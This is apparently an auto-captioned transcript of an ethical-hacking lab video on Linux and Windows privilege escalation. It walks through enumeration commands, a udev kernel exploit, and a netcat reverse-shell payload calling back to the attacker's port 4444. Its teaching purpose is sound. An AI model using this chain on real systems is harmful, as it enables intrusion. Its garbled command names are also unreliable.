1
00:00:00,150 --> 00:00:06,330
So privies escalation, when you first compromise a box, you know, you're going to notice that you

2
00:00:06,330 --> 00:00:12,390
may already have administrative rights, but, you know, if you don't, you know, what you need to

3
00:00:12,390 --> 00:00:14,570
do is something called privilege escalation.

4
00:00:14,790 --> 00:00:22,020
So pretty much this is just the act of trying to gain access, which we would call it for Linux or system

5
00:00:22,020 --> 00:00:23,550
of access for Windows.

6
00:00:23,760 --> 00:00:30,240
So this is going to make you like a super admin on the box and then you can do what I want pretty much.

7
00:00:30,300 --> 00:00:31,730
So that's really the goal.

8
00:00:31,740 --> 00:00:36,720
So I'm going to see you guys just like some different commands that you can run, like after you've

9
00:00:36,720 --> 00:00:37,560
already compromised.

10
00:00:37,570 --> 00:00:43,270
Those are like for Linux and Windows and give you an example of privacy escalation.

11
00:00:43,830 --> 00:00:49,590
OK, guys, so back in Archaia, Linux machines and others, you can go over some of the basic steps

12
00:00:49,590 --> 00:00:56,200
of gathering information on Oleynik machine, you know, figure out what's going on with this account

13
00:00:56,200 --> 00:00:57,480
and learn about the system.

14
00:00:57,680 --> 00:01:02,100
Where are you going to go to send different commands so that you can enumerate information and be able

15
00:01:02,100 --> 00:01:06,780
to figure out how you're exactly going to escalate your probabilities because you need to find some

16
00:01:06,780 --> 00:01:07,710
type of weakness.

17
00:01:07,980 --> 00:01:09,890
So to do that, you to find out about the system.

18
00:01:10,140 --> 00:01:11,750
So let's just go through some commands.

19
00:01:11,760 --> 00:01:15,990
So one of the first commands you can do is just figure out a little bit more about your user and the

20
00:01:15,990 --> 00:01:16,870
way that you can do that.

21
00:01:16,890 --> 00:01:20,400
Right now, we're in a massive admin account that we compromised before.

22
00:01:21,330 --> 00:01:24,360
You can create another account if you want, it's up to you.

23
00:01:25,470 --> 00:01:26,880
You just do that with the user.

24
00:01:26,880 --> 00:01:31,530
I come in and use that account was kind of up to you, especially when you compromised a box.

25
00:01:31,530 --> 00:01:32,150
You do what you want.

26
00:01:33,180 --> 00:01:37,680
So but one of the first things we can do, learning a little bit more about the user and groups and

27
00:01:37,680 --> 00:01:42,600
such, I like the type of proposals they have state ID and you get a little bit more.

28
00:01:43,410 --> 00:01:46,050
We see, like, you know, different groups and such over here.

29
00:01:46,320 --> 00:01:50,450
And we can kind of get a little bit more of an idea about what's going on with this user.

30
00:01:50,730 --> 00:01:56,670
So also, if you want to learn more about users on the system, you remember the shadow file and Linux.

31
00:01:56,670 --> 00:02:04,170
So we could do such slash shadow and see we don't have access for that.

32
00:02:04,170 --> 00:02:06,840
So maybe we can do it if we're lucky.

33
00:02:07,230 --> 00:02:10,800
So, OK, seems like shadow.

34
00:02:11,880 --> 00:02:15,130
A massive admit, and we can learn a little bit more.

35
00:02:15,150 --> 00:02:21,870
We see that there's different uses on here and now we can enumerate a little bit more like figure out,

36
00:02:21,870 --> 00:02:24,440
hey, you know, those are using a building on here.

37
00:02:25,410 --> 00:02:26,840
There's different users now.

38
00:02:26,850 --> 00:02:28,750
So now we know what's on the system.

39
00:02:28,760 --> 00:02:30,480
Maybe we have some new targets or something.

40
00:02:31,560 --> 00:02:35,640
And also, like you saw how it is, permission denied that will happen.

41
00:02:35,640 --> 00:02:38,820
Like in the real world, you may not actually have admin rights.

42
00:02:39,510 --> 00:02:42,880
So you have to be ready for, you know, not being able to print out this file.

43
00:02:43,050 --> 00:02:44,190
So that's very normal.

44
00:02:44,400 --> 00:02:45,730
But it doesn't matter.

45
00:02:45,750 --> 00:02:46,950
You just keep on enumerating.

46
00:02:46,980 --> 00:02:51,120
So one of the things we could do, we could have hostname and just enter.

47
00:02:51,450 --> 00:02:53,700
Now we know a little bit more about the hostname.

48
00:02:55,380 --> 00:02:59,450
So if we do Casaus XY, so that's the issue here.

49
00:03:00,300 --> 00:03:06,110
This is going to give us a little bit more information about the system in general.

50
00:03:06,390 --> 00:03:12,420
So we've kind of seen this when we whenever we go, Antonette, and it shows kind of this right here

51
00:03:12,720 --> 00:03:15,690
and gives us like information right there for logging.

52
00:03:15,690 --> 00:03:19,420
You know, we already have that, but you'll see different things or different systems.

53
00:03:19,440 --> 00:03:22,050
This is just metastable in how it's set up.

54
00:03:22,890 --> 00:03:29,640
So you can also do is Katsas EDC slash star dash release.

55
00:03:31,080 --> 00:03:34,840
And it's going to give you a little more information about the distribution of Linnik.

56
00:03:34,880 --> 00:03:40,080
So this is this is a boon to an eight point of four, which is way behind.

57
00:03:40,920 --> 00:03:46,860
So now we know, hey, this is a pretty old distribution of one to maybe there's some expertise out

58
00:03:46,860 --> 00:03:52,890
there so we can go look up X specifically, you know, four eight point zero four to maybe escalate

59
00:03:52,890 --> 00:03:53,520
privileges.

60
00:03:53,850 --> 00:04:00,960
Another thing that we can do is you name Dash A, and this is going to pretty much give us the kernel

61
00:04:00,960 --> 00:04:02,730
version in architecture.

62
00:04:02,730 --> 00:04:04,020
And this is very important.

63
00:04:04,830 --> 00:04:10,460
You know, when you're I would say that this is one of the more one of the commands that you want to

64
00:04:10,470 --> 00:04:15,690
run and they're going to give you idea because it's out there for privilege, escalation, for specific

65
00:04:15,690 --> 00:04:19,190
kernels of Lennix and for this one, I believe that there is as well.

66
00:04:19,260 --> 00:04:20,700
So it's really important to do that.

67
00:04:21,210 --> 00:04:25,170
So another command you could do is Aksu.

68
00:04:25,770 --> 00:04:32,720
And this is going to pretty much just print out the different processes that are running and the uses

69
00:04:32,740 --> 00:04:33,360
running them.

70
00:04:33,810 --> 00:04:38,130
And it's just kind of get a readable format so you can kind of see.

71
00:04:38,410 --> 00:04:44,250
So what we're going to do, what you would typically do is look through these, maybe see something

72
00:04:44,290 --> 00:04:48,180
of interest, and then you can look into a little bit more.

73
00:04:48,900 --> 00:04:54,750
What they know we're going to take advantage of is this one right here, which is you'd have this,

74
00:04:54,750 --> 00:04:55,980
you'd have the process.

75
00:04:56,340 --> 00:04:57,190
We're going to take a look.

76
00:04:57,270 --> 00:04:59,190
We're going to take advantage of that in a little bit.

77
00:04:59,820 --> 00:05:04,440
But let's continue enumerating because you don't want to stop just because you found one potential point

78
00:05:04,440 --> 00:05:04,930
of attack.

79
00:05:05,220 --> 00:05:09,240
You can probably attack a lot of these different processes that are running.

80
00:05:09,510 --> 00:05:14,670
So you just go through and do your research, write down things, take notes, and then start to look

81
00:05:14,670 --> 00:05:17,460
up like, hey, exploits for this excuse for that.

82
00:05:17,860 --> 00:05:19,350
That's kind of like what you would do.

83
00:05:20,070 --> 00:05:27,260
So we can also type in IPA just a little bit IP information, see what interfaces are in the system.

84
00:05:28,590 --> 00:05:35,280
We can also do slash spending, slash through and this is going to show us running table.

85
00:05:35,290 --> 00:05:36,800
This is not going to be too much here.

86
00:05:36,930 --> 00:05:41,010
You know, this is a small virtual network, so it's not too big of a deal.

87
00:05:41,640 --> 00:05:49,460
We can list out, you know, the network connections right now, just SS dash amp and we can look at

88
00:05:49,500 --> 00:05:54,840
here and see what kind of network connections are made right now, see what systems it's connected to,

89
00:05:54,840 --> 00:06:00,060
maybe numerary a little bit more, you know, about the network or about how this system specifically

90
00:06:00,660 --> 00:06:01,140
acts.

91
00:06:01,830 --> 00:06:07,260
One other thing that we can do is EDC slash Kranti daily.

92
00:06:08,890 --> 00:06:12,990
Oh, we can change over to that directory.

93
00:06:13,530 --> 00:06:21,480
So it's change over there as to L.A. and we can see like the different crosstabs, which are just automated

94
00:06:21,480 --> 00:06:24,870
jobs that run at a specified interval on Linux.

95
00:06:25,170 --> 00:06:30,960
So we can maybe check out some of those, see what's going on and see who's running them and maybe take

96
00:06:30,960 --> 00:06:33,570
advantage of those, put our own commands in there.

97
00:06:34,410 --> 00:06:39,720
And then it's also like a crime weekly on directory as well, on top of the daily one.

98
00:06:39,730 --> 00:06:45,510
So check both those out so then we can see Konta.

99
00:06:46,410 --> 00:06:51,030
And this will show us, you know, what crosstabs actually set to run and stuff like that.

100
00:06:51,060 --> 00:06:54,060
So very, very useful information.

101
00:06:54,540 --> 00:07:00,540
Cron jobs is there are definitely a way that people are able to take advantage of systems.

102
00:07:00,540 --> 00:07:05,820
So you definitely want to know like what tests are on here.

103
00:07:06,030 --> 00:07:11,280
And happening in particular is approvers like admin at its.

104
00:07:11,900 --> 00:07:16,790
And they might have, you know, insecure permission, so some of them to take advantage of one other

105
00:07:16,790 --> 00:07:26,540
thing that we can do is Deep Kaiji cell and this is just going to list out all the install packages.

106
00:07:26,780 --> 00:07:29,810
And so you see that there's versions and names and stuff.

107
00:07:29,810 --> 00:07:34,640
So we can definitely use this to find maybe some privileged escalation vulnerabilities.

108
00:07:34,880 --> 00:07:39,080
So you can so you can look through these and try to figure out some things.

109
00:07:39,080 --> 00:07:42,590
You see Virgin's names of services and stuff.

110
00:07:42,600 --> 00:07:44,870
So definitely something to take advantage of.

111
00:07:45,080 --> 00:07:49,530
OK, so now we know how to enumerate a little bit more for Lennix escalation.

112
00:07:49,610 --> 00:07:53,660
So let's actually try some escalation out for Lennix.

113
00:07:53,930 --> 00:07:56,180
So we're going to go back to that.

114
00:07:56,180 --> 00:08:02,930
You name Dasch a command and we see the colonel for Lennix.

115
00:08:02,960 --> 00:08:05,090
OK, so that's what we see.

116
00:08:05,240 --> 00:08:09,890
So it's very important to take note of that two point six point two four 16.

117
00:08:09,900 --> 00:08:11,210
So we know that that's there.

118
00:08:11,690 --> 00:08:12,750
There's going to be very important.

119
00:08:12,770 --> 00:08:17,600
So let's do a AWEX and then we're going to correct you.

120
00:08:17,600 --> 00:08:23,420
Deve remember I brought up you earlier, so this is going to print out all this service like all those

121
00:08:23,540 --> 00:08:28,360
currently running processes and then is only going to show us lines that have you dove in it.

122
00:08:28,380 --> 00:08:31,480
That's what it does if you don't remember from the living spaces.

123
00:08:32,420 --> 00:08:39,790
So as we can see right here, this one is running his route right here in the studio, Dayman.

124
00:08:40,130 --> 00:08:46,400
So this is what we're going to try to take advantage of, because we know that specifically that we

125
00:08:46,400 --> 00:08:48,140
already know that there's an exploit.

126
00:08:48,140 --> 00:08:49,460
You could have just done research on it.

127
00:08:49,460 --> 00:08:52,860
But we know that this actually for this for this kernel version.

128
00:08:53,210 --> 00:09:01,090
So what we can do is actually go to our Calli machines of another type and we could just do a search

129
00:09:01,100 --> 00:09:06,810
exploit and then we could type you univ and see what comes up.

130
00:09:07,790 --> 00:09:12,610
So we're going to look at this one in particular right here.

131
00:09:13,190 --> 00:09:19,700
It says Linux kernel two point six to eight points and slice nine point zero four.

132
00:09:20,060 --> 00:09:23,000
You do have less than version one point four point one.

133
00:09:23,330 --> 00:09:27,350
So we know that is actually falls into this criteria.

134
00:09:27,360 --> 00:09:29,130
So that's the way that we want to use.

135
00:09:29,690 --> 00:09:40,400
So what we can do is just such a dash and then eight, five, seven to see.

136
00:09:40,850 --> 00:09:44,080
And that's going to copy it into our current directory already over here.

137
00:09:44,690 --> 00:09:45,680
So I didn't know.

138
00:09:45,980 --> 00:09:50,890
But you can see we can just open it up then and actually take a look at the exploit.

139
00:09:51,860 --> 00:09:55,250
So this gives us an idea of the exploit, what's going on here?

140
00:09:55,460 --> 00:09:58,450
It tells us how to use the information about it.

141
00:09:59,030 --> 00:10:04,790
So says, hey, you before version one point four point one doesn't verify whether Nelligan message

142
00:10:04,790 --> 00:10:11,630
originates from kernel speech, which allows local users to gain privileges by sending a message from

143
00:10:11,630 --> 00:10:12,130
you to space.

144
00:10:12,130 --> 00:10:16,350
So that's the explanation was going on and then how to use it.

145
00:10:16,370 --> 00:10:18,790
So what we're going to have to do is pass the process.

146
00:10:18,800 --> 00:10:25,220
ID, as a kid is right there of the link socket and it tells you where that's listed at and we're going

147
00:10:25,220 --> 00:10:26,450
to go through and do all this.

148
00:10:27,050 --> 00:10:32,720
We're going to pass it in when we run, when we run the exploit and then the exploit is going to run

149
00:10:33,320 --> 00:10:39,140
something, a file that we create from like a script we're going to call a payload that's located in

150
00:10:39,140 --> 00:10:42,910
this last temp run directory on the target machine.

151
00:10:43,340 --> 00:10:45,390
So that's what we're going to do.

152
00:10:45,410 --> 00:10:46,880
So let's get out of here.

153
00:10:48,290 --> 00:10:49,220
So quit.

154
00:10:49,550 --> 00:10:59,360
So what we want to do is actually copy this file over to the MFAT, to the political machine, and we

155
00:10:59,360 --> 00:11:01,790
can do that with something called security copy.

156
00:11:02,000 --> 00:11:06,140
And the the command for this is just SICP.

157
00:11:06,740 --> 00:11:12,050
And then we put the phone is a five seven two C, and then we're going to put the user name.

158
00:11:12,060 --> 00:11:17,450
So MSF admin for that wrong MSF event.

159
00:11:18,160 --> 00:11:26,090
And then the IP address went on two to one six eight five six one zero four.

160
00:11:26,510 --> 00:11:34,460
And then to actually, you know, complete the SEP command, we're going to put a call in and then a

161
00:11:34,460 --> 00:11:38,680
four slash and then we're going to just put those into the temp directory then.

162
00:11:38,780 --> 00:11:43,730
So just to go over the command and get really quickly, we we're doing secure copy or copying this file

163
00:11:43,730 --> 00:11:45,400
right here is a Dossie file.

164
00:11:45,410 --> 00:11:46,240
It's redundancy.

165
00:11:46,850 --> 00:11:54,170
We are going to use these this council, MSF admin at this address, which is the most voidable box.

166
00:11:54,440 --> 00:11:59,840
And then we're putting it into the temp directories and it's going to ask for the password.

167
00:12:00,520 --> 00:12:02,090
So he's S.H. for the most part.

168
00:12:03,560 --> 00:12:07,050
So you put your password in MSF admin.

169
00:12:07,820 --> 00:12:08,380
There we go.

170
00:12:08,390 --> 00:12:08,780
Cool.

171
00:12:09,110 --> 00:12:09,860
I didn't know.

172
00:12:10,220 --> 00:12:11,240
So it Chazarreta.

173
00:12:11,320 --> 00:12:18,940
Over, so now what we can do is actually go back over to our session that we have here is CD size temp

174
00:12:19,360 --> 00:12:21,070
and already have some of the files here.

175
00:12:21,070 --> 00:12:22,360
But we're just going to do less.

176
00:12:22,750 --> 00:12:27,880
And as you can see, we have eight, five seven to see here now.

177
00:12:27,880 --> 00:12:29,460
So we just copy that over.

178
00:12:29,860 --> 00:12:39,850
So as you move for it is said that in the in the directory, in its temp directory, we need to have

179
00:12:39,850 --> 00:12:40,900
a file called Run.

180
00:12:41,170 --> 00:12:42,460
So the file is already there.

181
00:12:42,460 --> 00:12:43,930
But let's just check it out really quick.

182
00:12:44,200 --> 00:12:46,330
So we run and you could just type in.

183
00:12:46,330 --> 00:12:47,800
We run just to create the file.

184
00:12:50,090 --> 00:12:54,050
So so now so we have a miniature payload.

185
00:12:54,220 --> 00:12:55,470
So let's talk about what this does.

186
00:12:55,480 --> 00:13:02,380
So as we talked about before and the scripting section batch scripts, start with this pound sign and

187
00:13:02,380 --> 00:13:09,510
this man right here to use the show binary to like interpret this.

188
00:13:09,640 --> 00:13:14,410
So then what we're going to do is we're going to open up a Netcare session.

189
00:13:15,580 --> 00:13:22,780
So this is this big slice net that opens up that cat executes that binary, which, you know, in that

190
00:13:22,780 --> 00:13:25,300
cat does used to connect and listen and such.

191
00:13:26,050 --> 00:13:32,980
And then the dash e is telling you, hey, when you open up this session and execute the following binary,

192
00:13:32,980 --> 00:13:34,830
so is going to open up that cat.

193
00:13:35,620 --> 00:13:42,790
It's going to open up a shell and then it's going to, you know, listen out to this address.

194
00:13:43,660 --> 00:13:52,210
So it's one nine two one six eight five six Windows seven overreport four four four four.

195
00:13:52,610 --> 00:14:01,770
So it's just like creating a shell that's going to go back to our system once we execute the exploit.

196
00:14:02,860 --> 00:14:10,840
So one thing you might also need to do is on your Caleigh machine, you might need to actually allow

197
00:14:10,840 --> 00:14:15,850
traffic from the whole entire segment to your machine because it might not work.

198
00:14:16,410 --> 00:14:17,170
That's what I found.

199
00:14:17,230 --> 00:14:19,140
I was kind of developing this a little bit.

200
00:14:19,150 --> 00:14:21,790
So one thing you just do is pseudo.

201
00:14:21,880 --> 00:14:33,360
You have W studies suslow you have w allow from and then just pull one or two one six eight zero six

202
00:14:33,370 --> 00:14:33,900
twenty four.

203
00:14:33,910 --> 00:14:40,390
This will let all traffic come in from the subnet that we're on so that you're not going to have issues.

204
00:14:40,390 --> 00:14:44,680
What you want u turn to exploit is definitely something that you do.

205
00:14:44,860 --> 00:14:47,080
Kala's machines are pretty locked down.

206
00:14:47,440 --> 00:14:51,430
So, so we have our run file in there.

207
00:14:51,430 --> 00:14:57,670
That's our payload that's going to execute and connect back out to our box, allow us to get the access

208
00:14:57,670 --> 00:14:58,230
that we need.

209
00:14:58,600 --> 00:15:03,160
So now we just need to figure out the net link process ID.

210
00:15:03,820 --> 00:15:06,010
So let's go ahead.

211
00:15:06,010 --> 00:15:07,070
And we're on them.

212
00:15:07,240 --> 00:15:09,070
We're on our machine.

213
00:15:09,280 --> 00:15:19,360
So let's catch proc slash, proc slash nets, slash net link and we're going to look for this number

214
00:15:19,360 --> 00:15:20,340
right here.

215
00:15:20,590 --> 00:15:24,970
So two, three, six, seven, that's what we want right there.

216
00:15:25,780 --> 00:15:28,880
So let's take note of that number in our two, three, six, seven.

217
00:15:28,900 --> 00:15:30,700
So we are in the slash.

218
00:15:31,660 --> 00:15:34,180
We covid overexploit.

219
00:15:34,180 --> 00:15:37,750
So one last thing that we need to do is actually compile exploit.

220
00:15:37,990 --> 00:15:39,590
So what compiling does?

221
00:15:39,590 --> 00:15:41,410
It just turns it into an executable.

222
00:15:42,220 --> 00:15:49,810
So we're going to do G, C, C, this is the where we can use to compile things on Linux for C programs

223
00:15:50,050 --> 00:15:54,370
and then we're going to put eight five seven zero C and then let's do Dasch.

224
00:15:54,370 --> 00:15:57,400
Oh let's just call it UDA does exploit.

225
00:15:59,410 --> 00:16:00,190
Let's do that.

226
00:16:00,940 --> 00:16:08,280
OK, so on that photo, we have Aida Zwally file, we have our run file, everything's compiled.

227
00:16:08,290 --> 00:16:11,050
We have the process ID to two, three, six, seven.

228
00:16:11,260 --> 00:16:17,020
So what we need to do is actually before we run it, we actually need to start in that cat listener

229
00:16:17,020 --> 00:16:18,820
on our callisthenics machine.

230
00:16:19,330 --> 00:16:26,100
So let's go ahead and just do Incat Dash and OVP four four four four.

231
00:16:26,560 --> 00:16:31,660
And this is going to allow us to listen on, you know, that port, which is the port that we put in

232
00:16:31,750 --> 00:16:32,640
there run file.

233
00:16:33,070 --> 00:16:38,500
So as you can see, just to go over really quickly again, it's going to reach out to our machine as

234
00:16:38,500 --> 00:16:41,040
key to show over this port right here.

235
00:16:41,650 --> 00:16:43,030
So quick.

236
00:16:43,570 --> 00:16:52,710
So now what we can do is you exploit to these seven we bam and let's go back over here.

237
00:16:52,720 --> 00:16:58,510
So now is hey connected to, you know, Windows seven from one to four.

238
00:16:58,840 --> 00:17:07,050
So let's see whoever and our route and let's see hostname just to confirm my disposable.

239
00:17:07,160 --> 00:17:12,010
So now we just escalated our privileges and we can do whatever we want on this system.

240
00:17:12,280 --> 00:17:18,680
So that's kind of like a quick walk through of what you would do to escalate your privileges on Linux.

241
00:17:19,310 --> 00:17:25,360
OK, so before we get into the Windows, exploit the Windows privacy escalation stuff, we need to set

242
00:17:25,360 --> 00:17:31,450
up the computers a little bit more so that the little more vulnerable and so that we can also, you

243
00:17:31,450 --> 00:17:32,550
know, be able to connect to them.

244
00:17:32,800 --> 00:17:37,330
So you want to make sure that you have certain features turned on on Windows 10.

245
00:17:37,600 --> 00:17:43,600
You can find this just by typing features into the search box and click on the windows, turn windows

246
00:17:43,600 --> 00:17:44,860
features on or off.

247
00:17:45,220 --> 00:17:54,640
And what we're going to want to make sure is that we have SMB 1.0 spousal support on SMB direct on Telnet

248
00:17:54,640 --> 00:17:58,640
client, CFT client, just simple things that may or may not be on.

249
00:17:58,900 --> 00:18:00,860
It's going to be very helpful for what we're going to do.

250
00:18:01,180 --> 00:18:07,090
So once you select those, it'll turn them on and you just you said, OK, and then you'll be good to

251
00:18:07,090 --> 00:18:07,510
go.

252
00:18:09,040 --> 00:18:15,160
Another thing that we can do is you've got the admin rights for all this stuff too.

253
00:18:16,000 --> 00:18:18,450
But we also made it who made the accounts here?

254
00:18:18,460 --> 00:18:24,190
So what we're hacking, we're imagining that we don't know this information, but right now we're setting

255
00:18:24,190 --> 00:18:24,480
it up.

256
00:18:25,510 --> 00:18:33,670
So you want to go over here to under the system, just type in system here, click on the advanced system

257
00:18:33,670 --> 00:18:39,610
settings, click on the remote, and then make sure that you can allow connections to the computer remote

258
00:18:39,610 --> 00:18:40,150
desktop.

259
00:18:40,330 --> 00:18:41,040
That's how we're going to be.

260
00:18:41,350 --> 00:18:46,870
That's how we're going to connect to this computer because we're imagining that we captured credentials

261
00:18:47,680 --> 00:18:53,260
from this machine, you know, with our spoof login page like we did before with our spoofing.

262
00:18:53,270 --> 00:18:58,090
So that's in this case, we're assuming that we have access to the system.

263
00:18:58,240 --> 00:18:59,470
We don't have admin rights.

264
00:18:59,470 --> 00:19:02,290
We just have the poor victims account information.

265
00:19:02,920 --> 00:19:05,410
So that is what we're going to be doing right now.

266
00:19:05,440 --> 00:19:11,800
So one other thing that you can also do is actually set up some firewall rules if you want to do.

267
00:19:11,800 --> 00:19:12,520
It's pretty simple.

268
00:19:12,520 --> 00:19:17,830
Just you just open up windows to fit a firewall, new rule, click through and just like allow all or

269
00:19:17,830 --> 00:19:19,480
something like that over certain ports.

270
00:19:20,200 --> 00:19:22,060
So you can do that if you want to as well.

271
00:19:22,150 --> 00:19:27,250
Believe you don't have to if you do it, the DVD, those steps.

272
00:19:27,610 --> 00:19:35,140
One of the thing another way that you can do this is allowing app through firewall is covering up a

273
00:19:35,140 --> 00:19:37,050
list of stuff you might actually have to do this step.

274
00:19:37,810 --> 00:19:42,400
So you have to be admin, of course, but you also want to make sure that you're allowing like a remote

275
00:19:42,400 --> 00:19:52,330
desktop through over all these different profiles, allowing remote desktop through and whatever else

276
00:19:52,330 --> 00:19:57,340
that we might need, like these type of file sharing or something if it's on here.

277
00:19:57,610 --> 00:20:03,190
So any minute you want to be able to get through the firewall, you want to put that here and then you'll

278
00:20:03,190 --> 00:20:03,880
be good to go up.

279
00:20:03,880 --> 00:20:06,490
He set that up that you should be able to connect up to the machine.

280
00:20:07,330 --> 00:20:11,060
So let's go ahead and try to connect from Akali Machine to the Windows machine.

281
00:20:11,170 --> 00:20:17,020
OK, so one other thing that we're going to need to do is actually allow ourselves allow this account

282
00:20:17,020 --> 00:20:21,300
to be able to remote into the computer just so that you don't run into any issues.

283
00:20:21,360 --> 00:20:29,890
Are you going to do you go to the search box on a Windows time machine, just l USAR imgur masc and

284
00:20:29,890 --> 00:20:33,070
then just hit enter the things a little bit slower and have so much ram.

285
00:20:33,400 --> 00:20:39,580
But just do that and enter and it is going to pop up with this window and he's going to click on groups,

286
00:20:40,120 --> 00:20:46,180
you know, click on double click on remote desktop users ad and then you can just type in poor and you

287
00:20:46,600 --> 00:20:49,840
probably hit enter and it'll, it'll like autocomplete.

288
00:20:49,960 --> 00:20:53,080
So I already added it's a list I might apply.

289
00:20:54,440 --> 00:21:00,570
Is access denied so far to do this as an admin, so let's go back and exit out of this.

290
00:21:02,150 --> 00:21:12,090
And let's do local usar Magadha MASC, see, right, click it and write it as administrator.

291
00:21:12,980 --> 00:21:23,210
So this is the administrator, account administrator and then the password for that account and we can

292
00:21:23,250 --> 00:21:32,230
run this as an administrator and then now we can add or so Citigroup so at or at our victim to the group.

293
00:21:32,720 --> 00:21:34,100
So check me and go.

294
00:21:34,110 --> 00:21:35,970
OK, apply.

295
00:21:36,800 --> 00:21:41,060
OK, now we should be able to remoted so let's go to the next machine.

296
00:21:41,240 --> 00:21:43,270
OK, so on a colonics machine.

297
00:21:43,280 --> 00:21:49,550
So are we going to do is that our desktop commands pretty much just remote desktop for Linux and then

298
00:21:49,550 --> 00:21:50,520
put the IP address over.

299
00:21:50,540 --> 00:21:55,370
When does the machine enter is going to come with a nice pretty window for RTP.

300
00:21:55,530 --> 00:21:56,720
So we're going to do this.

301
00:21:56,720 --> 00:21:59,400
We're going to make sure we're logging into the domain.

302
00:21:59,450 --> 00:22:08,990
So ethical hacking lab slash is going to be a backslash that we're going to put poor victim and then

303
00:22:08,990 --> 00:22:10,120
the password.

304
00:22:11,810 --> 00:22:13,000
And so let us login.

305
00:22:13,050 --> 00:22:14,790
So now we have access to computers.

306
00:22:14,790 --> 00:22:15,710
So we fished them.

307
00:22:15,950 --> 00:22:17,840
We got his credentials.

308
00:22:18,170 --> 00:22:25,790
So we have access and now we need to, you know, log in, figure a little bit more, you know, about

309
00:22:25,790 --> 00:22:32,600
the network and what's going on on this computer as well and see what we can figure out.

310
00:22:32,840 --> 00:22:35,660
OK, so we're inside of our windows hosts.

311
00:22:36,380 --> 00:22:42,590
So what we're going to do is just go over some enumerations stuff for Windows to sort of get an idea

312
00:22:42,590 --> 00:22:45,540
of, you know, how to find something that might be vulnerable.

313
00:22:46,040 --> 00:22:51,680
So the first thing I want to do is open up a command prompt and you can look around some of the stuff

314
00:22:51,680 --> 00:22:55,480
in the GUI if you want, but we're going to get more bang for our buck in the command problem.

315
00:22:55,670 --> 00:23:01,030
So I want to open up a power shows a little more versatile and I love more powerful.

316
00:23:01,040 --> 00:23:05,060
So you just type in power shell that you exceed and that's going to load up.

317
00:23:05,960 --> 00:23:07,400
So we have that loaded up.

318
00:23:07,940 --> 00:23:13,610
We can just start trying to learn things so we could do like net user to learn a little bit more about,

319
00:23:13,610 --> 00:23:18,320
you know, the local user accounts here and see, you know, if there's any groups or anything, see

320
00:23:18,320 --> 00:23:20,270
what accounts are on the system.

321
00:23:20,870 --> 00:23:29,910
Hostname, just like Linux tells you to hostname, you can type in system info and get a preknowledge

322
00:23:29,930 --> 00:23:36,520
a lot of different information about the system and figure out the distribution to figure out, you

323
00:23:36,530 --> 00:23:41,220
know, when those ten enterprise is this build right here.

324
00:23:42,050 --> 00:23:46,340
This is definitely good information to let you know exactly.

325
00:23:46,490 --> 00:23:52,190
Hey, maybe this is a version of Windows that has a vulnerability, then I would go search for that.

326
00:23:53,420 --> 00:23:58,090
So another thing that we can do is actually look at the running processes right now.

327
00:23:58,100 --> 00:24:05,510
So task list and then slash SBC and it's going to give you a list of different running processes right

328
00:24:05,510 --> 00:24:11,270
now by by privileged users, but not for those users.

329
00:24:12,110 --> 00:24:13,850
So this is going to give you a good idea.

330
00:24:13,850 --> 00:24:16,460
Was running maybe you can find something as vulnerable?

331
00:24:16,670 --> 00:24:22,130
You know, I would look around, maybe start doing some searching for some of these executables right

332
00:24:22,130 --> 00:24:24,380
here and see if they're potentially vulnerable.

333
00:24:25,370 --> 00:24:31,160
If you want to look at the networking information to get a lay of the land line a little bit more about

334
00:24:31,160 --> 00:24:37,310
the network and just do it can fix all you can see all the interfaces and connections and everything.

335
00:24:37,490 --> 00:24:43,970
Another thing, if you want to learn a little bit more networking stuff so you can print and it's got

336
00:24:43,970 --> 00:24:45,470
a first of running tables.

337
00:24:45,470 --> 00:24:51,140
So this is just pretty much an explanation of how packets get from one destination to another.

338
00:24:51,410 --> 00:24:52,010
Pretty much.

339
00:24:52,010 --> 00:24:54,320
So that's some good information.

340
00:24:54,320 --> 00:24:56,570
If you're trying to learn, you know, hey, what's the network like?

341
00:24:56,840 --> 00:25:04,110
We can also do a net stat command and this is going to allow us to view all of our activities, connections.

342
00:25:04,110 --> 00:25:11,420
So we do Desh, you know, specifically, and this is going to give us the address, the important numbers

343
00:25:11,420 --> 00:25:17,660
and the process I.D. So now we kind of have an idea, OK, these are the active Tsipi connections.

344
00:25:17,900 --> 00:25:18,560
These are the poorest.

345
00:25:18,560 --> 00:25:20,870
They're running on these that are process IDs.

346
00:25:21,080 --> 00:25:25,840
When you start to get a feel of like what's going on, you know, on this system.

347
00:25:26,060 --> 00:25:29,810
So another thing that's good to look at is look at the firewall.

348
00:25:29,810 --> 00:25:32,740
You know, you want to see maybe what the rules are.

349
00:25:32,750 --> 00:25:42,120
So the first thing that we can do is do a net search and then every firewall and then show that a current

350
00:25:42,980 --> 00:25:43,730
profile.

351
00:25:45,230 --> 00:25:47,150
And it's going to show us the current profile.

352
00:25:47,160 --> 00:25:56,450
So we see that the domain profile is on deju and it tells us a little bit a little bit more about the

353
00:25:56,450 --> 00:25:57,260
firewall in general.

354
00:25:57,290 --> 00:26:01,530
So what we can also do to learn like the actual rules, if you wanted to, of.

355
00:26:01,750 --> 00:26:16,750
Not a of so I'm not going to enter a TV, so as net show, same thing, Eddie firewall show rule name

356
00:26:17,170 --> 00:26:23,610
equals all equals all the show.

357
00:26:23,630 --> 00:26:24,430
All Yeah.

358
00:26:25,510 --> 00:26:26,330
So maybe so.

359
00:26:26,800 --> 00:26:31,230
So this is going to be a command that you can run and it's going to show you all the firewalls.

360
00:26:31,240 --> 00:26:37,000
I don't want to do that because the last time I did it for like a million rules, but you can do that

361
00:26:37,000 --> 00:26:39,120
and get an idea of the different firewall rules.

362
00:26:39,130 --> 00:26:42,450
We could just go look at the firewall between figure that out if we wanted to.

363
00:26:42,670 --> 00:26:44,270
We do have access in here.

364
00:26:44,860 --> 00:26:56,830
So another thing that we can do is tasks slash query, slash EFO, ALLIÉS T v and this is going to show

365
00:26:56,830 --> 00:27:03,350
us the display tasks, the scheduled tasks, and it's going to display with verbose output.

366
00:27:03,370 --> 00:27:06,940
So just more output, much more information.

367
00:27:07,540 --> 00:27:11,970
So this is going to print a lot of stuff, just like the firewall rule command would have.

368
00:27:12,610 --> 00:27:17,530
So you can start to look through those if you want to start to get an idea of the different scheduled

369
00:27:17,530 --> 00:27:23,260
task and maybe take advantage of those kallikrein jobs in Linux, you can kind of potentially take advantage

370
00:27:23,260 --> 00:27:23,680
of those.

371
00:27:24,250 --> 00:27:30,160
One of the things we could do is look at, you know, the installed applications and versions that by

372
00:27:30,160 --> 00:27:31,390
Windows installer.

373
00:27:31,990 --> 00:27:33,700
I don't think that this one will have it.

374
00:27:33,700 --> 00:27:39,360
